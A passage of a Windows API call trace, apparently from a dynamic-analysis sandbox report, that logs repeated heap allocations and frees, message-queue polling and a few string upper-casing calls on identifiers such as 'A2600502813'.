0x2a72b08 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0153.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0153.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0153.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0153.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0153.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0153.017] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0153.017] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0153.017] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0153.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0153.017] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0153.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0153.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0153.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0153.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0153.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0153.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0153.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0153.019] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0153.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0153.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0153.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0153.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0153.020] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0153.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0153.021] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0153.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0153.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0153.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0153.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0153.022] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.023] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0153.023] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.023] RtlAllocateHeap (HeapHandle=0x2af0000, 